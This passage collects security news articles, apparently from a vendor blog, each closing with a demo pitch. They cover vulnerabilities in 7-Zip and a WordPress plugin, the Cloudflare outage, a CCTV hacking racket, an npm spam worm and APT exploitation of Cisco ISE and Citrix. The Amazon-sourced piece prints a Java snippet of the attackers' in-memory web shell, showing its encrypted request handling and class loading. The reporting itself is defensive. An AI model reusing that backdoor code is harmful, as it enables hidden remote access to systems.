In response to CVE-2025-11001, 7-Zip released version 25.00, which addresses the vulnerability and mitigates the risk of remote code execution via malicious archive files. Organizations and individual users are strongly advised to upgrade immediately. Delaying the update leaves systems exposed to potential threats that could be exploited once more attacks emerge.  System administrators should prioritize updating all endpoints and servers running vulnerable 7-Zip versions. Implementing this patch eliminates the directory traversal flaw, effectively neutralizing the possibility of arbitrary code execution through symbolic link abuse. 

Conclusion

CVE-2025-11001 is a high-severity 7-Zip vulnerability. While NHS systems haven’t seen confirmed exploitation, the public proof-of-concept raises the risk. Organizations should update to 7-Zip 25.00 or later and report incidents to NHS Digital.  To stay protected from threats like CVE-2025-11001, Cyble provides AI-driven vulnerability intelligence, helping organizations prioritize and patch critical risks before they are exploited. Schedule a personalized demo with Cyble to protect your systems today. 

The European Union Agency for Cybersecurity (ENISA) has taken a major step forward in advancing vulnerability management across Europe by becoming a CVE Root within the global Common Vulnerabilities and Exposures (CVE) Program. This designation makes ENISA a central point of contact for national and EU authorities, members of the EU CSIRTs Network, and other partners under its mandate.  Previously acting as a Common Vulnerability and Exposure (CVE) Numbering Authority (CNA), ENISA has been authorized since January 2024 to assign CVE Identifiers (CVE IDs) and publish CVE Records for vulnerabilities discovered by or reported to EU CSIRTs. The move to CVE Root status expands the agency’s responsibilities and strengthens the coordination of vulnerability management efforts throughout the EU.  ENISA’s Executive Director, Juhan Lepassaar, emphasized the importance of this milestone: “By becoming a Root, ENISA moves a step further to improve the development and capacity of the Agency to support vulnerability management in the EU. With the new responsibilities, ENISA extends its support to the CSIRTs network and to all its partners to further enhance the EU's ability to manage and coordinate cybersecurity vulnerabilities and improve digital security across the Union.”  This development aligns with wider EU investments in coordinated vulnerability disclosure, the European Vulnerability Database (EUVD), and responsibilities outlined in the Cyber Resilience Act (CRA). Under the CRA, ENISA will guide manufacturers on compliance, assist in applying the new cybersecurity framework, and contribute to the development of the Single Reporting Platform for vulnerability notifications. 

Understanding the CVE Program and ENISA’s Expanded Mandate 

Founded in 1999, the CVE Program serves as a global system for identifying and cataloging publicly disclosed vulnerabilities. CVE IDs and accompanying records allow developers, organizations, and cybersecurity professionals to understand and address security flaws quickly. As a key figure in this ecosystem, ENISA now plays an expanded role in supporting the identification, onboarding, and oversight of CNAs that fall within its scope.  As a CVE Root, ENISA will help enforce CVE Program guidelines, refine procedures for assigning and managing CVE IDs, and maintain its registry services to support the vulnerability coordination work of EU CSIRTs. It will also act as a central contact point for cooperative partners under its mandate.  ENISA will join the CVE Program Council of Roots, the coordinating body responsible for overseeing operational alignment among Root organizations. Internationally, Roots include MITRE, CISA, Google, Red Hat, and Japan’s JPCERT/CC. Within the EU, INCIBE-CERT, Thales Group, and CERT@VDE are existing Roots, now accompanied by ENISA. 

Transition Plans for Existing CNAs 

ENISA’s new Root scope applies to organizations within its mandate, and eligible CNAs interested in transitioning under ENISA’s Root may do so voluntarily. The CVE Program will collaborate closely with each organization to support a smooth and phased transition. This approach ensures that CNAs can align the change with their operational requirements while maintaining continuity in their vulnerability management processes.  By becoming a CVE Root, ENISA deepens its involvement in coordinated vulnerability management across the EU. The agency’s expanded duties will help enhance the accuracy and timeliness of CVE Records, improve cross-border coordination, and support responsible vulnerability disclosure practices. These advances contribute directly to reducing fragmentation across Member States and creating a more unified European cybersecurity ecosystem.  ENISA also plays a pivotal role in several strategic EU cybersecurity initiatives. It operates the European Vulnerability Database (EUVD), developed under the NIS2 Directive and now fully operational. Additionally, the agency is developing the Single Reporting Platform (SRP) under the Cyber Resilience Act to facilitate mandatory reporting of actively exploited vulnerabilities by manufacturers starting in September 2026. 

Conclusion  

As secretariat of the EU CSIRTs Network, ENISA plays a key role in coordinating vulnerability disclosure across Member States and guiding CVD policies, reinforcing Europe’s cybersecurity resilience. Its new CVE Root status further strengthens its capacity in vulnerability management and cross-border coordination.  Complementing these efforts, Cyble offers AI-driven threat intelligence and real-time monitoring, enabling European enterprises to detect, investigate, and mitigate emerging cyber threats. Request a personalized demo from Cyble today to enhance your organization’s cyber resilience. 

A disturbing case of hacking CCTV systems in India has exposed a widespread cybercrime racket through which intimate videos from a maternity ward were stolen and sold online. Police in Gujarat state say the discovery has raised concern for surveillance practices in a country where cameras are routinely placed across public and private spaces.  The case came to light earlier this year when Gujarati media outlets detected several videos on YouTube. These clips, taken inside a maternity hospital, showed pregnant women undergoing medical examinations and receiving injections in their buttocks.   Each video carried a link directing viewers to Telegram channels where longer versions of the footage could be purchased. To protect the privacy of those filmed, the city and the maternity hospital’s name have not been disclosed.  

From a Single Hospital Breach to a Nationwide Cybercrime Operation 

The hospital director told the BBC that the cameras had been installed “for the safety of doctors” and to guard against false allegations. None of the women seen in the videos has filed police complaints.  Once alerted, investigators uncovered what they described as a massive nationwide cybercrime racket. Police say hackers had infiltrated at least 50,000 CCTV systems throughout India and were selling footage taken from hospitals, schools, residential complexes, offices, malls, and even private homes.   Many of the stolen clips were marketed for prices ranging from 800 to 2,000 rupees, while some Telegram operators reportedly offered live feeds through subscription-based access. According to officers, the case demonstrates how a single CCTV hack can compromise thousands of devices due to weak digital protection. 

Arrests, Charges, and the Spread of the Network 

Arrests connected to the network have been made since February, spanning Maharashtra, Uttar Pradesh, Gujarat, Delhi, and Uttarakhand. The suspects face charges under laws addressing privacy violations, cyberterrorism, voyeurism, and the publication of obscene material. Police noted that no patient or hospital lodged an official complaint, largely due to fear of exposure and social stigma. Instead, a police officer formally initiated the case to prevent the matter from being dropped.  The breach reflects the widespread vulnerabilities built into India’s surveillance ecosystem. Many CCTV units operate with default passwords such as “Admin123,” practice investigators say aided the hackers. Officers reported that the group used brute-force tools to access networks, enabling them to capture feed from thousands of locations. Specialists advise users to periodically change IP addresses and passwords, conduct routine audits of their systems, and adopt stronger security measures for both home and professional networks. 

Growing Concerns About Surveillance and Privacy 

The proliferation of CCTV across India, from hospital wards to private apartments, has created a fertile ground for hacking CCTV incidents, exposing sensitive footage, and disproportionately affecting women, who often hesitate to report breaches due to stigma. Despite government efforts to tighten digital security, gaps remain, and this latest breach highlights how quickly insecure systems can be exploited and sensitive data spread online. Platforms like Cyble offer a proactive solution, leveraging AI-native intelligence to monitor dark web activity, detect vulnerabilities, and prevent cybercrime before it impacts victims. Organizations looking to protect their networks and gain real-time threat visibility can schedule a free demo with Cyble to experience how its agentic AI hunts, predicts, and neutralizes threats autonomously, keeping security teams ahead of hackers. 

A major Cloudflare outage struck on 18 November 2025, beginning at 11:20 UTC and spreading across its global network within minutes. Although the issue initially looked like a large-scale Cloudflare cyberattack, it was later confirmed to be an internal configuration error that disrupted company’s core traffic-routing systems.

According to Cloudflare, the disruption began when one of the company’s database systems generated incorrect data and published it across the network. The problem stemmed from altered permissions in a ClickHouse database cluster, which inadvertently caused the system to output duplicate rows into a “feature file” used by Cloudflare’s Bot Management module. The feature file, normally stable in size, doubled unexpectedly. Once this oversized file propagated across Cloudflare’s machines, the software responsible for distributing global traffic encountered a hard limit and failed. This internal malfunction translated into widespread HTTP 5xx errors for users trying to reach websites that rely on Cloudflare’s network. A screenshot shared by the company showed the generic error page millions of users saw during the outage. Cloudflare initially suspected that the symptoms resembled a hyper-scale DDoS attack, a concern shaped partly by recent “Aisuru” attack campaigns, raising fears of a potential cyberattack on Cloudflare. The company later clarified that “the issue was not caused, directly or indirectly, by a cyber attack or malicious activity of any kind.” Once engineers discovered the faulty feature file, they halted its propagation and reinserted an earlier, stable version.  Core traffic began recovering by 14:30 UTC, and Cloudflare reported full restoration of all systems by 17:06 UTC. “Given Cloudflare’s importance in the Internet ecosystem, any outage of any of our systems is unacceptable,” the company wrote, noting that the incident was “deeply painful to every member of our team.” 

Why the System Failed During the Cloudflare Outage 

The root cause of the Cloudflare outage originated with a permissions change applied at 11:05 UTC. Cloudflare engineers were in the process of improving how distributed queries run in ClickHouse. Historically, internal processes assumed that metadata queries returned results only from the “default” database. The new permissions change allowed these queries to also surface metadata from the underlying “r0” database.  A machine learning–related query, used to build the Bot Management feature configuration file, combined metadata from both locations without filtering database names. The oversight caused the file to double in size as duplicate features were added. Bot Management modules preallocate memory based on a strict feature limit of 200 entries; the malformed file exceeded this threshold, triggering a Rust panic within the proxy system.  Because Cloudflare’s core proxy (called FL, or “Frontline”) touches nearly every request on the network, the failure cascaded quickly. The newer version of the proxy system, FL2, also encountered 5xx errors. Legacy FL systems did not crash, but they produced invalid bot scores, defaulting everything to zero and potentially leading to false positives for customers who blocked bot traffic. 

Systems Impacted 

The Cloudflare outage disrupted multiple services: 

• Core CDN and security services returned widespread HTTP 5xx errors. 

• Turnstile, Cloudflare’s verification system, failed to load, preventing many users from logging into the Cloudflare dashboard. 

• Workers KV experienced a sharp increase in error rates until engineers applied a bypass patch at 13:04, stabilizing dependent services. 

• Cloudflare Access experienced authentication failures from the start of the incident. Existing sessions remained valid, but new attempts failed and returned error pages. 

• Email Security continued processing email but temporarily lost access to an IP reputation source, slightly reducing spam-detection accuracy. 

Cloudflare also noted latency spikes across its CDN during the incident as debugging and observability tools consumed excess CPU while attempting to analyze the errors.  Complicating the investigation further, Cloudflare’s external status page briefly went offline, despite being completely hosted outside Cloudflare’s network, adding to internal suspicion that an attacker might be targeting multiple systems simultaneously. This coincidence reinforced early fears of a potential Cloudflare cyberattack, though this theory was later dismissed. 

Post-Incident Actions and Next Steps 

After restoring service, Cloudflare implemented a series of fixes, strengthening configuration protection, improving kill-switch controls, refining proxy error-handling, and preventing diagnostic tools from overwhelming system resources. The company described the event as its most serious outage since 2019, noting that while it briefly raised concerns about a potential cyberattack on Cloudflare, the root cause was purely internal.   Events like this highlight the value of proactive threat intelligence. Cyble, ranked #1 globally in Cyber Threat Intelligence Technologies on Gartner Peer Insights, provides AI-native, autonomous threat detection and attack-surface visibility. To assess your organization’s exposure and strengthen resilience, book a personized demo or start a free External Threat Assessment today. 

A severe security flaw has been discovered in the popular W3 Total Cache WordPress plugin, potentially exposing more than one million websites to remote code execution (RCE). The vulnerability, officially cataloged as CVE-2025-9501, allows attackers to take full control of affected sites without requiring any login credentials.  The security issue affects W3 Total Cache versions prior to 2.8.13. Classified as an unauthenticated command injection, this flaw exists in the plugin _parse_dynamic_mfunc function, which handles the processing of dynamic content on WordPress sites. Exploitation of the vulnerability is alarmingly straightforward: attackers can embed malicious PHP code within a comment on any post, which the server will execute with the same privileges as the WordPress site itself. 

Understanding CVE-2025-9501 Vulnerability 

Because no authentication is required, the attack can be performed remotely by anyone with knowledge of a vulnerable site. Once executed, it can allow attackers to run arbitrary PHP commands, potentially leading to full site compromise. Consequences of an exploit include data theft, malware installation, website defacement, or redirecting visitors to malicious sites.  The severity of CVE-2025-9501 is reflected in its CVSS score of 9.0, categorizing it as a critical vulnerability. The ease of exploitation and the fact that it can be launched without user interaction make this a high-risk security concern for WordPress administrators. 

Timeline and Public Disclosure 

The vulnerability was publicly documented on October 27, 2025, giving website owners just over three weeks to address the issue before a proof-of-concept (PoC) was scheduled for release on November 24, 2025. This disclosure window has created a critical period during which unpatched WordPress sites running W3 Total Cache remain highly susceptible to attacks.  Security advisories, including one from wpscan.com, provide a detailed description of the vulnerability:  "The plugin is vulnerable to command injection via the _parse_dynamic_mfunc function, allowing unauthenticated users to execute PHP commands by submitting a comment with a malicious payload to a post."  The plugin author has confirmed that the issue has been fixed in W3 Total Cache version 2.8.13. 

Recommended Actions for WordPress Site Owners 

The immediate and most effective mitigation is to update W3 Total Cache to version 2.8.13 or higher. This patched release addresses the command injection flaw and prevents potential exploitation.  In addition to updating the plugin, site administrators are advised to: 

• Review website logs for any unusual comment activity during the vulnerability disclosure period. 
• Inspect posts and comments for malicious payloads that may have been submitted. 
• Implement additional security measures, such as limiting comments to registered users, maintaining regular backups, and using security plugins to detect unauthorized activity. 

Failure to update promptly leaves WordPress sites exposed to attackers who can exploit CVE-2025-9501 with minimal effort. Given the wide installation of W3 Total Cache across WordPress websites, the vulnerability represents a significant risk to the broader web ecosystem. 

Conclusion 

CVE-2025-9501 reiterates the need for WordPress administrators to maintain plugins and stay vigilant against new cyber threats and exploits. Over a million sites using W3 Total Cache were at risk, highlighting how a single vulnerability can jeopardize countless websites. Updating the patched version, monitoring site activity, and implementing strong security practices are essential to prevent unauthorized access.  Organizations looking for better protection against vulnerability exploitation can leverage Cyble’s advanced threat intelligence. Cyble helps prioritize patching, track exploits, and gain early visibility into emerging risks, ensuring critical assets remain protected.  Take proactive action today – Schedule a Demo with Cyble to strengthen your vulnerability management strategy. 

At the High-Level Segment of the World Telecommunication Development Conference (WTDC-25), India presented a vision for a sustainable and inclusive global digital future, noting collective responsibility in strengthening cybersecurity and expanding equitable digital access.   Union Minister of State for Communications and Rural Development, Dr. Pemmasani Chandra Sekhar, delivered India’s address, reaffirming the country’s enduring association with the International Telecommunication Union (ITU), a partnership established in 1869. 

India’s Expanding Global Digital Future 

Dr. Chandra Sekhar framed India’s digital agenda through the guiding principle of Vasudhaiva Kutumbakam, “the world is one family.” He asserted that this ethos continues to shape India’s contributions to global connectivity and shared technological progress as the world moves toward a unified global digital future.  [caption id="attachment_106867" align="aligncenter" width="602"] Source: WTDC-25[/caption] During his remarks, he noted the unprecedented scale of India’s digital transformation. He stated that Bharat has become “one of the world’s most connected societies,” supporting 1.2 billion telecom subscribers, 1 billion internet users, and 1.4 billion digital identities. The Minister also highlighted the government's $4.8 billion investment in expanding last-mile 4G access and noted that India has achieved the world’s fastest 5G rollout, covering 99% of districts.  He added that India maintains some of the lowest data tariffs globally while registering among the highest data consumption levels. With a digital infrastructure enabling 46% of global digital transactions, India, he said, demonstrates how “accessibility, affordability, and scale can advance together.” 

Cybersecurity as a Shared Global Imperative 

A big portion of his address focused on strengthening cybersecurity as a central pillar of international cooperation. Dr. Chandra Sekhar stated that cybersecurity “is no longer a national concern but a global imperative,” urging countries to develop unified, cross-border systems capable of protecting digital ecosystems worldwide.  He also referenced India’s initiatives to secure its growing digital environment, including systems like Sanchar Saathi and the Financial Fraud Risk Indicator. According to the Minister, these tools have blocked 30 million fraudulent mobile connections and prevented 6.6 million financial fraud attempts, showcasing India’s way of protecting digital users as it works with global partners toward a safer global digital future. 

Call for Global Digital Unity 

In closing, Dr. Chandra Sekhar stressed that international collaboration remains essential in ensuring inclusivity, security, and sustainability as countries navigate the digital era. “Just as rivers grow mightier when they flow together, India stands ready to join hands with the global community to build a digital ecosystem that empowers people, protects our planet, and ensures no nation is left behind,” he said.  The World Telecommunication Development Conference (WTDC), organized by the ITU Development Sector (ITU-D), serves as a platform for shaping global development priorities in telecommunications and digital connectivity. It brings together governments, industry leaders, and international experts to craft strategies that strengthen ICT infrastructure, close digital divides, and support inclusive growth, particularly for developing nations.   The WTDC-25 conference in Baku will influence the next cycle of global initiatives focused on achieving universal, meaningful, and affordable connectivity for all. Organizations seeking deeper visibility into cyber threats, dark-web exposure, or new vulnerabilities can explore Cyble’s AI-native threat intelligence ecosystem to better understand new cybersecurity risks. To assess your external attack surface or learn how autonomous, intelligence-driven tools can support modern security operations, you may request a personalized demonstration or a free external threat assessment from Cyble. 

Android has shared new insights into how the platform’s long-term shift toward Rust is reshaping both security and software development. The new data reflects a decisive move toward memory safety, and, unexpectedly, faster engineering cycles across the Android ecosystem.  The Android team reported that memory safety vulnerabilities have dropped below 20% of all Android vulnerabilities for the first time. This data covers code contributions across C, C++, Java, Kotlin, and Rust in both first- and third-party components. Although the report arrives before the end of 2025, the industry-standard 90-day patch window means the numbers are unlikely to shift much before the year’s end.  Rust adoption has been central to this trend. According to the Android team, Rust offers a 1000x reduction in memory safety vulnerability density when compared to C and C++. Yet the most surprising results aren’t limited to security. Rust-based changes now carry a 4x lower rollback rate and spend 25% less time on code review. 

Shifting the Balance in Systems Programming 

Android’s historical reliance on systems languages like C and C++ meant that adopting Rust was never meant to replace Java or Kotlin, but to provide a safer alternative where low-level control is required. As Rust usage rises and new C++ additions slowly decline, first-party code trends now show Rust and C++ contributing comparable volumes of new systems-level code.  This parity allows meaningful performance comparisons using the DORA framework, which evaluates engineering teams based on throughput and stability. Android engineers working in both Rust and C++ were measured using similar-sized changes and overlapping developer pools to ensure fairness. 

Throughput Improvements: Fewer Revisions, Faster Reviews 

Data stretching back to 2023 has shown consistent patterns: Rust code requires roughly 20% fewer revisions than equivalent C++ code. Rust changes also spend 25% less time in review, a trend the Android team attributes partly to rising Rust expertise between 2023 and 2024.  While these incremental gains help, the largest improvement is visible in stability metrics.  Rust’s low rollback rate continues to decline even as its adoption surpasses C++. For medium and large changes, Rust changes are rolled back at about one-quarter the rate of C++. Because rollbacks disrupt multiple teams, initiate postmortems, and trigger rebuilds, this stability substantially increases overall productivity.  A 2022 Google survey found that engineers perceived Rust as easier to review and more likely to be correct. The new data empirically supports those perceptions. 

Rust’s Footprint 

Rust’s role in Android is expanding beyond platform code: 

• Kernel: Android 6.12 is the first shipping kernel with Rust support enabled and includes the platform’s first production Rust driver. Android is also collaborating with Arm and Collabora on a Rust-based GPU driver. 
• Firmware: Rust has been deployed in firmware for years. Android and Arm are now collaborating on Rusted Firmware-A to enhance security in high-privilege firmware environments. 

First-party apps: 

• Nearby Presence uses Rust for secure Bluetooth-based device discovery. 
• MLS, the RCS messaging security protocol, is implemented in Rust and will appear in Google Messages in a future release. 
• Chromium has replaced PNG, JSON, and web-font parsers with Rust-based memory-safe implementations. 

The First Almost-Vulnerability in Rust 

Android nearly shipped what would have been its first Rust-based memory safety flaw: a linear buffer overflow in CrabbyAVIF. It never reached public release, but the team assigned it CVE-2025-48530 to track it through internal channels.  The Scudo hardened allocator prevented exploitation. Scudo’s guard pages stopped the overflow and converted what could have been silent corruption into a visible crash, though crash reporting initially lacked clarity. Android has since improved overflow.  To reduce unsafe risks further, Android is adding a new deep-dive module on unsafe Rust to its Comprehensive Rust training program, focusing on sound use of unsafe blocks, undefined behavior, safety comments, and safe abstractions. 

Conclusion 

Android’s experience with Rust shows that even with some unsafe code, memory safety improves dramatically: only one potential vulnerability across 5 million lines, compared with around 1,000 per million lines in C/C++. This shift allows development to move faster while staying secure, replacing “move fast and break things” with a model where safety and productivity reinforce each other. 

A cyberattack on Danish institutions disrupted several government and defense-related websites on November 13, according to the country’s Civil Protection Agency. The incident, which involved widespread DDoS attacks, caused temporary outages across multiple online services and prompted authorities to intensify monitoring alongside Denmark’s military intelligence service.  The Civil Protection Agency reported that “several Danish companies and websites were currently experiencing outages and operating disruptions because of DDoS attacks.” As officials noted, a DDoS attack overwhelms a website’s servers by flooding them with traffic, blocking access for legitimate users. The agency said it was “following the situation closely,” indicating the scale and persistence of the disruptions.  Shortly after the cyberattack on the Danish government, the pro-Russian hacker group NoName057 reportedly claimed responsibility on social media. The group alleged it had targeted systems belonging to the Danish government, including the Ministry of Transport and the public-sector portal Borger.dk. Defense contractor Terma was also named in the claims and later confirmed that it had been affected.  Tobias Brun-Falkencrone, a spokesperson for Terma, addressed the situation cautiously. “We’re aware that a Russian hacker group has claimed that it would disrupt our website, as well as the ones of several Danish authorities, but it’s too early to say they are responsible,” he remarked. He emphasized that Terma’s systems responded effectively: “We are well geared to handle this kind of cyberattack and acted quickly. There were no security breaches and no data was lost”, reported Singaporean newspaper The Straits Times. 

Attacks Follow Earlier Disruptions Ahead of Local Elections 

The November 13 attacks came just a day after NoName057 claimed it had targeted several Danish municipal websites on November 12. These earlier disruptions occurred less than a week before Denmark’s local elections, drawing attention to the country’s strong support for Ukraine and the potential geopolitical motivations behind the digital assaults.  International reports, including coverage from AFP and Ukrinform, noted that the cyberattack on Danish institutions aligns with a broader wave of pro-Russia cyber activity affecting European nations. In the Netherlands, Russian hackers recently stole personal data from residents in a municipality.   In Poland, a payment system was breached, resulting in the theft of customer information from a major tour company. Ukrinform also highlighted an incident in which Russian state-linked hackers infiltrated systems belonging to a British defense contractor, exposing sensitive employee data on the dark web. 

Authorities Continue Monitoring Amid Rising Cyber Threats 

Although the Danish government has not reported any data loss or long-term damage, the recurring DDoS attacks highlight persistent vulnerabilities in public infrastructure and defense-linked networks. Authorities have not released detailed technical findings but remain engaged in coordinated oversight to assess potential links to broader geopolitical tensions.  The Civil Protection Agency and military intelligence continue to monitor the situation, signaling that Denmark is preparing for additional attempts to disrupt critical digital systems in the near future. 

Security researchers have uncovered a large-scale spam campaign within the npm ecosystem, now known as the IndonesianFoods worm. The attack involves over 43,000 spam packages published across at least 11 user accounts over the past two years. Rather than attempting to steal credentials or data, this worm focuses on polluting the npm registry with junk packages, an attack that nearly doubles the known number of malicious npm packages in existence.  The spam campaign began more than two years ago and has continued systematically, flooding the registry with dormant payloads disguised as legitimate projects. Paul McCarty’s investigation revealed that the worm had been quietly operating across multiple accounts, making it harder for detection systems to identify the scale of the operation. 

The Naming Scheme Behind the “IndonesianFoods Worm” 

The IndonesianFoods worm derives its name from its distinctive naming scheme and the internal dictionaries embedded within its malicious code. The script uses two lists, one containing Indonesian personal names such as andi, budi, cindy, and zul, and another containing Indonesian food terms like rendang, sate, bakso, and tapai.  When executed, the script randomly selects one name, one food term, adds a random number between 1 and 100, and appends a suffix like “-kyuki” or “-breki.” Examples of generated package names include “andi-rendang23-breki” and “zul-tapai9-kyuki.” This combination of names and foods gives the worm both its unique identity and its connection to Indonesia, which inspired its name.  McCarty stated that the attack “focuses on creating new packages rather than stealing credentials or engaging in other immediately malicious behavior.” Instead, it exploits npm’s open publishing model to overwhelm the registry with automated spam, disrupting developers, and polluting search results. 

Accounts and Behavior of the Spam Campaign 

The IndonesianFoods worm has been traced to at least 11 npm accounts, including voinza, yunina, noirdnv, veyla, vndra, vayza, doaortu, jarwok, bipyruss, sernaam.b.y, and rudiox. Each of these accounts was created specifically for this operation, collectively responsible for publishing thousands of packages. None of them appears to be compromised by legitimate users.  Once the malware is triggered, typically through a file like auto.js, it modifies the package.json file, assigns random version numbers, and publishes new packages continuously using the npm publish command. This happens in an infinite loop, creating a new spam package roughly every seven seconds. The result is an ongoing flood of junk data that strains npm’s infrastructure and risks contaminating legitimate dependency chains if developers accidentally install one of the packages.  Though the payload does not directly steal data or credentials, it turns the npm registry itself into an attack vector, weaponizing its openness to spread an enormous volume of fake packages. 

Conclusion 

The IndonesianFoods worm exposes how modern spam campaigns in software supply chains rely on automation and persistence to evade detection. Over two years, attackers, possibly linked to Indonesia, published tens of thousands of malicious npm packages, undermining trust in open ecosystems.   With threats growing more coordinated, Cyble’s AI-native threat intelligence platform helps organizations detect, predict, and neutralize new cyber risks. Book a free demo to uncover vulnerabilities and strengthen your defense against large-scale attacks like the IndonesianFoods worm. 

Amazon’s threat intelligence division has revealed a cyber-espionage campaign involving an advanced persistent threat (APT) group exploiting previously undisclosed zero-day vulnerabilities in systems from Cisco and Citrix. The investigation showed that the attackers specifically targeted critical identity and network access control infrastructure; components of enterprises rely on managing authentication and enforcing security policies across their networks.  The initial discovery came from Amazon’s MadPot honeypot service, which detected exploitation attempts of the Citrix “Bleed Two” vulnerability, now tracked as CVE-2025-5777, before it had been made public. This early detection confirmed that the APT had been using the flaw as a zero-day vulnerability.  Further analysis linked the same threat actor to another zero-day vulnerability within Cisco Identity Service Engine (ISE). Amazon shared details of a suspicious payload with Cisco, which led to the identification of a flaw in the deserialization logic of an undocumented Cisco ISE endpoint.   The vulnerability, now designated CVE-2025-20337, allowed pre-authentication remote code execution, granting attackers administrator-level access to affected systems. What raised additional alarm was that this exploitation occurred before Cisco had assigned a CVE number or released patches.

Deployment of a Custom Web Shell 

Following the successful compromise of targeted systems, the threat actor deployed a custom-built web shell disguised as a legitimate Cisco ISE component called IdentityAuditAction. Unlike typical off-the-shelf malware, this backdoor was tailored specifically for Cisco ISE environments.  Amazon’s investigation revealed that the web shell operated entirely in-memory, leaving minimal traces for forensic analysis. It used Java reflection to inject itself into active threads, registered as an HTTP listener on the Tomcat server to intercept all HTTP requests, and encrypted its communication with DES encryption using non-standard Base64 encoding. Accessing the shell required knowledge of specific HTTP headers, further obscuring its presence.  The following snippet from the deserialization routine demonstrates the actor’s authentication mechanism for accessing the backdoor: 

if (matcher.find()) {    requestBody = matcher.group(1).replace("*", "a").replace("$", "l");    Cipher encodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");    decodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");    byte[] key = "d384922c".getBytes();    encodeCipher.init(1, new SecretKeySpec(key, "DES"));    decodeCipher.init(2, new SecretKeySpec(key, "DES"));    byte[] data = Base64.getDecoder().decode(requestBody);    data = decodeCipher.doFinal(data);    ByteArrayOutputStream arrOut = new ByteArrayOutputStream();    if (proxyClass == null) {        proxyClass = this.defineClass(data);    } else {        Object f = proxyClass.newInstance();        f.equals(arrOut);        f.equals(request);        f.equals(data);        f.toString();    } }  

Defensive Measures for CVE-2025-20337 and CVE-2025-5777 

The simultaneous exploitation of CVE-2025-20337 and CVE-2025-5777 demonstrates the growing trend of APTs focusing on identity and access control infrastructure as high-value targets. According to Amazon, the attacks were indiscriminate and internet-facing, meaning any unpatched or exposed systems were at risk during the campaign.  The “patch-gap” exploitation, attacking systems in the window before vendors can issue fixes, highlights a persistent challenge in enterprise cybersecurity. Such tactics are commonly used by well-funded threat groups that possess advanced research capabilities or access to undisclosed vulnerability data.  Amazon emphasized that even well-maintained systems can fall victim to pre-authentication zero-days, denoting the need for defense-in-depth strategies. Security teams are advised to: 

• Restrict access to privileged security appliance endpoints like Cisco ISE and Citrix management portals through network segmentation and firewalls. 
• Closely monitor for anomalous activity, such as unrecognized HTTP listeners, unusual in-memory processes, or encryption anomalies. 
• Stay current with vendor advisories and threat intelligence feeds regarding emerging zero-day vulnerabilities. 
• Minimize public internet exposure of critical identity and network control systems, routing access through VPNs or isolated management interfaces. 

Conclusion 

Amazon’s findings reveal how today’s threat actors are targeting identity and access systems as key entry points. By exploiting CVE-2025-5777 in Citrix and CVE-2025-20337 in Cisco ISE, attackers demonstrated both precision and intent.  Cyble helps enterprises stay ahead of such threats with its advanced Vulnerability Management platform. By monitoring emerging zero-days, prioritizing patches by risk, and offering deep insights into active exploits, Cyble empowers security teams to act before attackers do.  Schedule a demo to discover how its AI-driven intelligence can strengthen your defense against modern cyber threats. 

The integration of artificial intelligence (AI) into business operations has become one of the most interesting trends in Australia’s corporate landscape. However, alongside the promise of innovation and productivity, a new report from CPA Australia warns that this digital shift is amplifying cybersecurity risks across the nation’s business community.  According to CPA Australia’s Business Technology Report 2025, which surveyed over 1,100 accounting and finance professionals across the Asia-Pacific region, 18% of Australian businesses experienced financial or time losses due to cyber incidents over the past year. The findings highlight a particularly vulnerable segment—small and medium enterprises (SMEs), which often lack the technical expertise and resources needed to mount effective cyber defenses.  Gavan Ord, CPA Australia’s business investment and international lead, cautioned that while the enthusiasm for AI adoption is welcome, it must be balanced by stronger digital protection. “Australian small businesses generally lag behind their Asian counterparts in technology adoption,” Ord explained. “The good news is that investment in AI is now accelerating. However, it is vital that this is matched by investment in cybersecurity in Australia.” 

Rising AI Adoption, Rising Cyber Threats 

The report revealed that 71% of Australian businesses plan to further integrate artificial intelligence into their operations by 2026. While this growing reliance on automation and data-driven systems is expected to boost productivity, it also broadens the potential attack surface for cybercriminals.  Ord warned that the misuse or poor management of AI tools could create new vulnerabilities. “Used correctly, AI can drive business growth and efficiency,” he said. “But it also provides criminals with more advanced methods to exploit weaknesses. The last thing a business needs is a major investment in technology, opening the door to hackers.”  Cybercriminals are increasingly leveraging AI themselves, using machine learning to design phishing campaigns, automate attacks, and evade detection. This evolution makes Australia's cybersecurity efforts more crucial than ever, particularly for small businesses with limited security budgets. 

No Business Is Immune 

Even larger organizations, which typically have more advanced security frameworks, are not exempt from these risks. The CPA Australia report found that companies of all sizes reported losses due to cyber incidents, underlining the universality of the threat. Ord noted that “cybercriminals target weaknesses, not size,” meaning that both multinational corporations and local firms face exposure if they neglect proper protection.  The consequences of a breach can be devastating, ranging from direct financial loss and reputational damage to prolonged business disruptions. For smaller enterprises, even a single successful attack could threaten their survival. 

Strengthening Defenses in the AI Era 

In response to the findings, CPA Australia has urged all businesses to revisit and update their cybersecurity policies. The organisation recommends several key measures: maintaining strong firewalls and multi-factor authentication; educating employees on phishing and cyber hygiene; and seeking expert guidance when developing digital protection strategies.  Businesses are also encouraged to leverage resources such as the Australian Cyber Security Centre’s Essential Eight framework and government-supported training programs, which provide practical tools and education for strengthening cyber resilience.  Ord emphasized that prevention is far more cost-effective than recovery. “AI offers powerful insights, but it must be supported by human oversight and strong governance to mitigate risks,” he said. “Implementing robust cybersecurity measures is now as essential as adopting modern IT systems. Without them, businesses risk losing clients, revenue, and most importantly, their reputation.” 

Conclusion 

Australian businesses must balance innovation with protection. As organizations increasingly adopt artificial intelligence, the risks of cyberattacks also grow. CPA Australia’s latest report warns that AI’s benefits can quickly turn into vulnerabilities without strong digital protection.   Addressing this challenge, Cyble, a global leader in AI-powered threat intelligence, is strengthening Australia's cybersecurity through predictive defense and real-time intelligence. With platforms like Cyble Blaze and Cyble Vision, Cyble enables enterprises to detect and neutralize threats before they strike, helping businesses innovate safely in a digital-first world.  Secure your future with Cyble. Experience how AI-driven platforms can protect your business from tomorrow’s threats. Book your free demo today

Microsoft’s November Patch Tuesday release for 2025 has delivered fixes for 63 security flaws across its software portfolio, including one zero-day vulnerability already being exploited in the wild. The company’s monthly update also contains four “Critical” vulnerabilities, two involving remote code execution (RCE), one linked to privilege escalation, and another tied to information disclosure.  This month’s update addresses vulnerabilities across a wide range of Microsoft products and services. Although the number of vulnerabilities is lower compared to recent months, the presence of an active zero-day makes November’s cycle critical for administrators. Microsoft noted that some of the “Important” rated flaws could still be leveraged in complex attack chains, particularly those affecting widely deployed components like Office, Windows Kernel, and Azure services. 

Actively Exploited Zero-Day: CVE-2025-62215 

